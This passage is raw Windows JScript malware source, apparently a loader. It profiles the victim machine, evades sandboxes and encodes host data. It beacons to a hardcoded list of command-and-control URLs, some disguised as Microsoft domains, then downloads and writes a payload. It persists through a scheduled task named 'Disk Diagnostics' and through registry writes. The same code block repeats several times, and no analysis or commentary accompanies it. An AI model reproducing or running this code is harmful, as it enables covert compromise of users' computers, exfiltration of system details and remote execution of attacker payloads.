1775. };
1776.  
1777.  
1778. var GlobalStrings = {
1779. REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
1780. WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
1781. WMIC_EXEC : "wmic process call create \"%path%\"",
1782. TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
1783. TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
1784. NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
1785. ADS_SSID : "HDDScan",
1786. PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
1787. TASK_NAME : "Disk Diagnostics"
1788. }
1789.  
1790.  
1791. var ObjectProducer = {}
1792. ObjectProducer.AccesibleObjects = {
1793. MAIN_SH_OBJECT : 'WScript.Shell',
1794. STREAM_ACCESS_OBJECT : 'ADODB.Stream',
1795. XML_TREE_OBJECT : 'Microsoft.XMLDOM',
1796. XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
1797. HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
1798. FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
1799. };
1800.  
1801. ObjectProducer.GetRootConstructor = function(){
1802. return ActiveXObject;
1803. }
1804.  
1805. ObjectProducer.GetInstance = function(instanceKey){
1806. var rootConstructor = ObjectProducer.GetRootConstructor();
1807. return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
1808. }
1809.  
1810.  
1811.  
1812. var DataTools = {};
1813. DataTools.KEY_BASE = 1029;
1814.  
1815. DataTools.DeriveKey = function(keyStr){
1816. var keyBase = DataTools.KEY_BASE;
1817. var key = 0;
1818.  
1819. for(var i = 0; i < keyStr.length; i++){
1820. keyBase = keyBase ^ keyStr.charCodeAt(i);
1821. }
1822.  
1823. var _keyBase = keyBase.toString();
1824. for(var i = 0; i < _keyBase.length; i++){
1825. key += parseInt(_keyBase.charAt(i));
1826. }
1827.  
1828. return key;
1829. }
1830.  
1831. DataTools.RotString = function(str, key){
1832. var rotd = "";
1833. for(var i = 0; i < str.length; i++){
1834. rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
1835. }
1836.  
1837. return rotd;
1838. }
1839.  
1840. DataTools.Hash = function(str){
1841. for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
1842. h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
1843.  
1844. return ((h ^ h >>> 16) >>> 0).toString(16);
1845. }
1846.  
1847. DataTools.Random = {};
1848. DataTools.Random.Number = function(min, max){
1849. min = Math.ceil(min);
1850. max = Math.floor(max);
1851. return Math.floor(Math.random() * (max - min + 1)) + min;
1852. }
1853.  
1854. DataTools.Random.String = function(len){
1855. var alphabet = "qwertyuiopasdfghjklzxcvbnm";
1856. var result = "";
1857. for(var i = 0; i < len; i++){
1858. var chr = DataTools.Random.Number(0, alphabet.length-1);
1859. result = result.concat(alphabet.charAt(chr));
1860. }
1861.  
1862. return result;
1863. }
1864.  
1865.  
1866. DataTools.Strings = {};
1867. DataTools.Strings.ParseTemplate = function(str, templateStr){
1868. var template = templateStr.split('&');
1869. for(var i = 0; i < template.length; i++){
1870. var keyValue = template[i].split('=');
1871. str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
1872. }
1873.  
1874. return str;
1875. }
1876.  
1877. var Windows = {};
1878. Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
1879. Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
1880.  
1881. Windows.Execute = function(command){
1882. Windows.CoMainObject.Run(command);
1883. }
1884.  
1885. Windows.GetEnv = function(env){
1886. return Windows.CoMainObject.ExpandEnvironmentStrings(env);
1887. }
1888.  
1889. Windows.RegRead = function(path){
1890. return Windows.CoMainObject.RegRead(path);
1891. }
1892.  
1893. Windows.RegWrite = function(entry, value){
1894. Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
1895. }
1896.  
1897. Windows.CreateFile = function(path){
1898. var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
1899. fHandle.WriteLine(DataTools.Random.String(1024));
1900. fHandle.Close();
1901. }
1902.  
1903. Windows.AppendDataStream = function(path, stream, data){
1904. var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
1905. fHandle.WriteLine(data);
1906. fHandle.Close();
1907. }
1908.  
1909. Windows.AppendDataStreamB = function(path, stream, data){
1910. data.SaveToFile(path.concat(":").concat(stream), 2);
1911. data.Close();
1912. }
1913.  
1914. Windows.WriteData = function(path, data){
1915. var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
1916. fHandle.Write(data);
1917. fHandle.Close();
1918. }
1919.  
1920. Windows.WriteBytes = function(path, data){
1921. data.SaveToFile(path, 2);
1922. data.Close();
1923. }
1924.  
1925. Windows.WriteDataStreamBytes = function(path, stream, data){
1926. data.SaveToFile(path.concat(":").concat(stream), 2);
1927. data.Close();
1928. }
1929.  
1930. Windows.ReadFile = function(path){
1931. var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
1932. return fHandle.ReadAll();
1933. }
1934.  
1935. Windows.GetWMIProvider = function(pcname){
1936. return GetObject("winmgmts:"+
1937. "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
1938. }
1939.  
1940. Windows.GetUptime = function(){
1941. try{
1942. var wmi = Windows.GetWMIProvider(".");
1943. var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
1944. var e = new Enumerator(queryResult);
1945.  
1946. return parseInt(e.item().SystemUpTime);
1947. }catch(e){
1948. return 0;
1949. }
1950. }
1951.  
1952. Windows.GetArch = function(){
1953. var architecture = "64";
1954. var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
1955.  
1956. if(product.indexOf('Windows 7') != -1){
1957. architecture = "32";
1958. }
1959.  
1960. return architecture;
1961. }
1962.  
1963.  
1964. var Http = {};
1965. Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
1966. Http.Request = function(url){
1967. try{
1968. Http.Client.Open('GET', url, false);
1969. Http.Client.Send();
1970.  
1971. if(Http.Client.Status == 200)
1972. return Http.Client.ResponseText;
1973. else
1974. return "";
1975. }catch(e){
1976. return ""
1977. }
1978. }
1979.  
1980.  
1981. var Loader = {};
1982. Loader.USERNAME = Windows.GetEnv("%username%");
1983. Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
1984. Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
1985. Loader.Uptime = Windows.GetUptime();
1986. Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
1987.  
1988. Loader.GetUid = function(){
1989. return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
1990. }
1991.  
1992. Loader.GetInitialRequest = function(nonce){
1993. var uid = Loader.GetUid();
1994. var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
1995.  
1996. var sessionKey = nonce + config.C2_OB_KEY;
1997. request = request.join(":");
1998. request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
1999. request = Base64Encode(request);
2000.  
2001. return encodeURIComponent(request);
2002. }
2003.  
2004. Loader.GetInitialEndpoint = function(){
2005. var nonce = DataTools.Random.String(12)
2006. var request = Loader.GetInitialRequest(nonce);
2007.  
2008. var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic&regclid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
2009. return endpoint;
2010. }
2011.  
2012. Loader.DeployHost = function(){
2013. var temp = Windows.GetEnv("%temp%");
2014. var architecture = Windows.GetArch();
2015. var nonce = DataTools.Random.String(12);
2016. var uid = Loader.GetUid();
2017. var sessionKey = nonce + config.C2_OB_KEY;
2018.  
2019. var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
2020. encodedId = Base64Encode(encodedId);
2021. encodedId = encodeURIComponent(encodedId);
2022.  
2023. var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
2024. pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
2025.  
2026. var filename = uid.concat(".bin");
2027.  
2028. Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
2029. return temp.concat("\\").concat(filename);
2030.  
2031. }
2032.  
2033. Loader.DeployClient = function() {
2034. if (Loader.Uptime <= 3000) {
2035. WScript.Quit(0);
2036. }
2037.  
2038. for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
2039. for (var j = 0; j < config.PRIMARY_C2.length; j++) {
2040. try {
2041. var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
2042. response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
2043.  
2044. if (response.indexOf('<<<CLIENT__') !== -1) {
2045. var client = response.replace('<<<CLIENT__', '');
2046. client = Base64text(client);
2047.  
2048. Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
2049. Windows.RegWrite("SetupServiceKey", Loader.GetUid());
2050.  
2051. SELECTED_C2 = config.PRIMARY_C2[j];
2052. Loader.Persist(client);
2053. return;
2054.  
2055. }
2056. } catch (e) {
2057.  
2058. }
2059.  
2060. WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
2061. }
2062. }
2063. }
2064.  
2065. Loader.Persist = function(client){
2066.  
2067. var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
2068. var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
2069.  
2070. Windows.Execute(taskCommand);
2071. Windows.RegWrite("ServerUrl", client);
2072. Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
2073.  
2074. Windows.CreateFile(GlobalStrings.NTFILE_PATH);
2075.  
2076. Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
2077.  
2078. Loader.DeployHost();
2079. }
2080.  
2081. function debug(message){
2082. ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
2083. }
2084.  
2085.  
2086. function Base64text(string){
2087. var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
2088. var element = XmlDOM.createElement("tempContainer");
2089. element.dataType = "bin.Base64";
2090. element.text = string;
2091.  
2092. var stream = WScript.CreateObject("ADODB.Stream");
2093. stream.Type = 1;
2094. stream.Open();
2095. stream.Write(element.nodeTypedValue);
2096.  
2097. stream.Position = 0;
2098. stream.Type = 2;
2099. stream.CharSet = "utf-8";
2100.  
2101. return stream.ReadText();
2102. }
2103.  
2104. function StringToBinary(string){
2105. var BinaryStream = new ActiveXObject("ADODB.Stream");
2106. BinaryStream.Type = 2;
2107. BinaryStream.CharSet = "ascii";
2108. BinaryStream.Open();
2109. BinaryStream.WriteText(string);
2110. BinaryStream.Position = 0;
2111. BinaryStream.Type = 1;
2112. BinaryStream.Position = 0;
2113. return BinaryStream.Read();
2114. }
2115.  
2116.  
2117. function Base64bytes(string){
2118. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
2119. var element = XmlDOM.createElement("Base64Data");
2120. element.dataType = "bin.base64";
2121.  
2122. element.text = string;
2123.  
2124. var stream = WScript.CreateObject("ADODB.Stream");
2125. stream.Type = 1;
2126. stream.Open();
2127.  
2128. stream.Write(element.nodeTypedValue);
2129. return stream;
2130. }
2131.  
2132. function Base64Encode(string) {
2133.  
2134. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
2135. var element = XmlDOM.createElement("Base64Data");
2136. element.dataType = "bin.base64";
2137.  
2138. element.nodeTypedValue = StringToBinary(string);
2139.  
2140. return element.text.replace(/\n/g, "").replace(/\/\//g, "");
2141. }
2142.  
2143.  
2144. if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
2145. Loader.DeployClient();
2146. }
2147. var config = {
2148. PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
2149. SOFT_SIG : 'mad29',
2150. SOFT_VERSION: 32,
2151. C2_REQUEST_SLEEP : 21,
2152. C2_FAIL_SLEEP : 21,
2153. C2_FAIL_COUNT : 20,
2154. C2_OB_KEY : 'JxTRG4mY',
2155.  
2156.  
2157. C2_PREFIX : 'rpc.aspx'
2158. }
2159.  
2160.  
2161. var SELECTED_C2 = config.PRIMARY_C2[0];
2162.  
2163.  
2164. Math.imul = function (a, b) {
2165. var ah = (a >>> 16) & 0xffff;
2166. var al = a & 0xffff;
2167. var bh = (b >>> 16) & 0xffff;
2168. var bl = b & 0xffff;
2169. return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
2170. };
2171.  
2172.  
2173. var GlobalStrings = {
2174. REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
2175. WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
2176. WMIC_EXEC : "wmic process call create \"%path%\"",
2177. TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
2178. TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
2179. NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
2180. ADS_SSID : "HDDScan",
2181. PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
2182. TASK_NAME : "Disk Diagnostics"
2183. }
2184.  
2185.  
2186. var ObjectProducer = {}
2187. ObjectProducer.AccesibleObjects = {
2188. MAIN_SH_OBJECT : 'WScript.Shell',
2189. STREAM_ACCESS_OBJECT : 'ADODB.Stream',
2190. XML_TREE_OBJECT : 'Microsoft.XMLDOM',
2191. XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
2192. HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
2193. FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
2194. };
2195.  
2196. ObjectProducer.GetRootConstructor = function(){
2197. return ActiveXObject;
2198. }
2199.  
2200. ObjectProducer.GetInstance = function(instanceKey){
2201. var rootConstructor = ObjectProducer.GetRootConstructor();
2202. return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
2203. }
2204.  
2205.  
2206.  
2207. var DataTools = {};
2208. DataTools.KEY_BASE = 1029;
2209.  
2210. DataTools.DeriveKey = function(keyStr){
2211. var keyBase = DataTools.KEY_BASE;
2212. var key = 0;
2213.  
2214. for(var i = 0; i < keyStr.length; i++){
2215. keyBase = keyBase ^ keyStr.charCodeAt(i);
2216. }
2217.  
2218. var _keyBase = keyBase.toString();
2219. for(var i = 0; i < _keyBase.length; i++){
2220. key += parseInt(_keyBase.charAt(i));
2221. }
2222.  
2223. return key;
2224. }
2225.  
2226. DataTools.RotString = function(str, key){
2227. var rotd = "";
2228. for(var i = 0; i < str.length; i++){
2229. rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
2230. }
2231.  
2232. return rotd;
2233. }
2234.  
2235. DataTools.Hash = function(str){
2236. for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
2237. h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
2238.  
2239. return ((h ^ h >>> 16) >>> 0).toString(16);
2240. }
2241.  
2242. DataTools.Random = {};
2243. DataTools.Random.Number = function(min, max){
2244. min = Math.ceil(min);
2245. max = Math.floor(max);
2246. return Math.floor(Math.random() * (max - min + 1)) + min;
2247. }
2248.  
2249. DataTools.Random.String = function(len){
2250. var alphabet = "qwertyuiopasdfghjklzxcvbnm";
2251. var result = "";
2252. for(var i = 0; i < len; i++){
2253. var chr = DataTools.Random.Number(0, alphabet.length-1);
2254. result = result.concat(alphabet.charAt(chr));
2255. }
2256.  
2257. return result;
2258. }
2259.  
2260.  
2261. DataTools.Strings = {};
2262. DataTools.Strings.ParseTemplate = function(str, templateStr){
2263. var template = templateStr.split('&');
2264. for(var i = 0; i < template.length; i++){
2265. var keyValue = template[i].split('=');
2266. str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
2267. }
2268.  
2269. return str;
2270. }
2271.  
2272. var Windows = {};
2273. Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
2274. Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
2275.  
2276. Windows.Execute = function(command){
2277. Windows.CoMainObject.Run(command);
2278. }
2279.  
2280. Windows.GetEnv = function(env){
2281. return Windows.CoMainObject.ExpandEnvironmentStrings(env);
2282. }
2283.  
2284. Windows.RegRead = function(path){
2285. return Windows.CoMainObject.RegRead(path);
2286. }
2287.  
2288. Windows.RegWrite = function(entry, value){
2289. Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
2290. }
2291.  
2292. Windows.CreateFile = function(path){
2293. var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
2294. fHandle.WriteLine(DataTools.Random.String(1024));
2295. fHandle.Close();
2296. }
2297.  
2298. Windows.AppendDataStream = function(path, stream, data){
2299. var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
2300. fHandle.WriteLine(data);
2301. fHandle.Close();
2302. }
2303.  
2304. Windows.AppendDataStreamB = function(path, stream, data){
2305. data.SaveToFile(path.concat(":").concat(stream), 2);
2306. data.Close();
2307. }
2308.  
2309. Windows.WriteData = function(path, data){
2310. var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
2311. fHandle.Write(data);
2312. fHandle.Close();
2313. }
2314.  
2315. Windows.WriteBytes = function(path, data){
2316. data.SaveToFile(path, 2);
2317. data.Close();
2318. }
2319.  
2320. Windows.WriteDataStreamBytes = function(path, stream, data){
2321. data.SaveToFile(path.concat(":").concat(stream), 2);
2322. data.Close();
2323. }
2324.  
2325. Windows.ReadFile = function(path){
2326. var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
2327. return fHandle.ReadAll();
2328. }
2329.  
2330. Windows.GetWMIProvider = function(pcname){
2331. return GetObject("winmgmts:"+
2332. "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
2333. }
2334.  
2335. Windows.GetUptime = function(){
2336. try{
2337. var wmi = Windows.GetWMIProvider(".");
2338. var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
2339. var e = new Enumerator(queryResult);
2340.  
2341. return parseInt(e.item().SystemUpTime);
2342. }catch(e){
2343. return 0;
2344. }
2345. }
2346.  
2347. Windows.GetArch = function(){
2348. var architecture = "64";
2349. var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
2350.  
2351. if(product.indexOf('Windows 7') != -1){
2352. architecture = "32";
2353. }
2354.  
2355. return architecture;
2356. }
2357.  
2358.  
2359. var Http = {};
2360. Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
2361. Http.Request = function(url){
2362. try{
2363. Http.Client.Open('GET', url, false);
2364. Http.Client.Send();
2365.  
2366. if(Http.Client.Status == 200)
2367. return Http.Client.ResponseText;
2368. else
2369. return "";
2370. }catch(e){
2371. return ""
2372. }
2373. }
2374.  
2375.  
2376. var Loader = {};
2377. Loader.USERNAME = Windows.GetEnv("%username%");
2378. Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
2379. Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
2380. Loader.Uptime = Windows.GetUptime();
2381. Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
2382.  
2383. Loader.GetUid = function(){
2384. return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
2385. }
2386.  
2387. Loader.GetInitialRequest = function(nonce){
2388. var uid = Loader.GetUid();
2389. var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
2390.  
2391. var sessionKey = nonce + config.C2_OB_KEY;
2392. request = request.join(":");
2393. request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
2394. request = Base64Encode(request);
2395.  
2396. return encodeURIComponent(request);
2397. }
2398.  
2399. Loader.GetInitialEndpoint = function(){
2400. var nonce = DataTools.Random.String(12)
2401. var request = Loader.GetInitialRequest(nonce);
2402.  
2403. var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic&regclid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
2404. return endpoint;
2405. }
2406.  
2407. Loader.DeployHost = function(){
2408. var temp = Windows.GetEnv("%temp%");
2409. var architecture = Windows.GetArch();
2410. var nonce = DataTools.Random.String(12);
2411. var uid = Loader.GetUid();
2412. var sessionKey = nonce + config.C2_OB_KEY;
2413.  
2414. var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
2415. encodedId = Base64Encode(encodedId);
2416. encodedId = encodeURIComponent(encodedId);
2417.  
2418. var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
2419. pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
2420.  
2421. var filename = uid.concat(".bin");
2422.  
2423. Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
2424. return temp.concat("\\").concat(filename);
2425.  
2426. }
2427.  
2428. Loader.DeployClient = function() {
2429. if (Loader.Uptime <= 3000) {
2430. WScript.Quit(0);
2431. }
2432.  
2433. for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
2434. for (var j = 0; j < config.PRIMARY_C2.length; j++) {
2435. try {
2436. var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
2437. response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
2438.  
2439. if (response.indexOf('<<<CLIENT__') !== -1) {
2440. var client = response.replace('<<<CLIENT__', '');
2441. client = Base64text(client);
2442.  
2443. Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
2444. Windows.RegWrite("SetupServiceKey", Loader.GetUid());
2445.  
2446. SELECTED_C2 = config.PRIMARY_C2[j];
2447. Loader.Persist(client);
2448. return;
2449.  
2450. }
2451. } catch (e) {
2452.  
2453. }
2454.  
2455. WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
2456. }
2457. }
2458. }
2459.  
2460. Loader.Persist = function(client){
2461.  
2462. var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
2463. var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
2464.  
2465. Windows.Execute(taskCommand);
2466. Windows.RegWrite("ServerUrl", client);
2467. Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
2468.  
2469. Windows.CreateFile(GlobalStrings.NTFILE_PATH);
2470.  
2471. Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
2472.  
2473. Loader.DeployHost();
2474. }
2475.  
2476. function debug(message){
2477. ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
2478. }
2479.  
2480.  
2481. function Base64text(string){
2482. var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
2483. var element = XmlDOM.createElement("tempContainer");
2484. element.dataType = "bin.Base64";
2485. element.text = string;
2486.  
2487. var stream = WScript.CreateObject("ADODB.Stream");
2488. stream.Type = 1;
2489. stream.Open();
2490. stream.Write(element.nodeTypedValue);
2491.  
2492. stream.Position = 0;
2493. stream.Type = 2;
2494. stream.CharSet = "utf-8";
2495.  
2496. return stream.ReadText();
2497. }
2498.  
2499. function StringToBinary(string){
2500. var BinaryStream = new ActiveXObject("ADODB.Stream");
2501. BinaryStream.Type = 2;
2502. BinaryStream.CharSet = "ascii";
2503. BinaryStream.Open();
2504. BinaryStream.WriteText(string);
2505. BinaryStream.Position = 0;
2506. BinaryStream.Type = 1;
2507. BinaryStream.Position = 0;
2508. return BinaryStream.Read();
2509. }
2510.  
2511.  
2512. function Base64bytes(string){
2513. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
2514. var element = XmlDOM.createElement("Base64Data");
2515. element.dataType = "bin.base64";
2516.  
2517. element.text = string;
2518.  
2519. var stream = WScript.CreateObject("ADODB.Stream");
2520. stream.Type = 1;
2521. stream.Open();
2522.  
2523. stream.Write(element.nodeTypedValue);
2524. return stream;
2525. }
2526.  
2527. function Base64Encode(string) {
2528.  
2529. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
2530. var element = XmlDOM.createElement("Base64Data");
2531. element.dataType = "bin.base64";
2532.  
2533. element.nodeTypedValue = StringToBinary(string);
2534.  
2535. return element.text.replace(/\n/g, "").replace(/\/\//g, "");
2536. }
2537.  
2538.  
2539. if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
2540. Loader.DeployClient();
2541. }
2542. var config = {
2543. PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
2544. SOFT_SIG : 'mad29',
2545. SOFT_VERSION: 32,
2546. C2_REQUEST_SLEEP : 21,
2547. C2_FAIL_SLEEP : 21,
2548. C2_FAIL_COUNT : 20,
2549. C2_OB_KEY : 'JxTRG4mY',
2550.  
2551.  
2552. C2_PREFIX : 'rpc.aspx'
2553. }
2554.  
2555.  
2556. var SELECTED_C2 = config.PRIMARY_C2[0];
2557.  
2558.  
2559. Math.imul = function (a, b) {
2560. var ah = (a >>> 16) & 0xffff;
2561. var al = a & 0xffff;
2562. var bh = (b >>> 16) & 0xffff;
2563. var bl = b & 0xffff;
2564. return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
2565. };
2566.  
2567.  
2568. var GlobalStrings = {
2569. REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
2570. WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
2571. WMIC_EXEC : "wmic process call create \"%path%\"",
2572. TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
2573. TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
2574. NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
2575. ADS_SSID : "HDDScan",
2576. PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
2577. TASK_NAME : "Disk Diagnostics"
2578. }
2579.  
2580.  
2581. var ObjectProducer = {}
2582. ObjectProducer.AccesibleObjects = {
2583. MAIN_SH_OBJECT : 'WScript.Shell',
2584. STREAM_ACCESS_OBJECT : 'ADODB.Stream',
2585. XML_TREE_OBJECT : 'Microsoft.XMLDOM',
2586. XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
2587. HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
2588. FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
2589. };
2590.  
2591. ObjectProducer.GetRootConstructor = function(){
2592. return ActiveXObject;
2593. }
2594.  
2595. ObjectProducer.GetInstance = function(instanceKey){
2596. var rootConstructor = ObjectProducer.GetRootConstructor();
2597. return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
2598. }
2599.  
2600.  
2601.  
2602. var DataTools = {};
2603. DataTools.KEY_BASE = 1029;
2604.  
2605. DataTools.DeriveKey = function(keyStr){
2606. var keyBase = DataTools.KEY_BASE;
2607. var key = 0;
2608.  
2609. for(var i = 0; i < keyStr.length; i++){
2610. keyBase = keyBase ^ keyStr.charCodeAt(i);
2611. }
2612.  
2613. var _keyBase = keyBase.toString();
2614. for(var i = 0; i < _keyBase.length; i++){
2615. key += parseInt(_keyBase.charAt(i));
2616. }
2617.  
2618. return key;
2619. }
2620.  
2621. DataTools.RotString = function(str, key){
2622. var rotd = "";
2623. for(var i = 0; i < str.length; i++){
2624. rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
2625. }
2626.  
2627. return rotd;
2628. }
2629.  
2630. DataTools.Hash = function(str){
2631. for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
2632. h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
2633.  
2634. return ((h ^ h >>> 16) >>> 0).toString(16);
2635. }
2636.  
